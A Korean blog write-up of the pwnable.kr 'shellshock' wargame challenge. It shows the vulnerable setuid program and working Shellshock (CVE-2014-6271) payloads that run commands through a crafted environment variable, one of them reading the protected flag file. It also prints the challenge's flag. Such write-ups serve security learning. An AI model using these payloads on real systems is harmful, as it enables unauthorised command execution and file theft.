반응형
shellshock - 1 pt
Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure :)
ssh shellshock@pwnable.kr -p2222 (pw:guest)
shellshock@ubuntu:~$ cat shellshock.c
#include <stdio.h>
int main(){
setresuid(getegid(), getegid(), getegid());
setresgid(getegid(), getegid(), getegid());
system("/home/shellshock/bash -c 'echo shock_me'");
return 0;
}
bash의 shellshock 취약점 문제
shellshock@ubuntu:~$ env x='() { :;}; echo hi' ./bash
hi
취약점이 있다.
그러면 shellshock의 권한을 이용해서 flag를 읽으면 될 것 같다.
env x='() { :;}; /bin/cat flag' ./shellshock
shellshock@ubuntu:~$ env x='() { :;}; /bin/cat flag' ./shellshock
only if I knew CVE-2014-6271 ten years ago..!!
Segmentation fault
FLAG : only if I knew CVE-2014-6271 ten years ago..!!
반응형
'WAR GAME > Pwnable.kr' 카테고리의 다른 글
pwnable.kr [blackjack] 풀이 (0) | 2018.03.18 |
---|---|
pwnable.kr [coin1] 풀이 (2) | 2018.03.12 |
pwnable.kr [mistake] 풀이 (0) | 2018.03.08 |
pwnable.kr [leg] 풀이 (0) | 2018.03.07 |
pwnable.kr [input] 풀이 (0) | 2018.03.06 |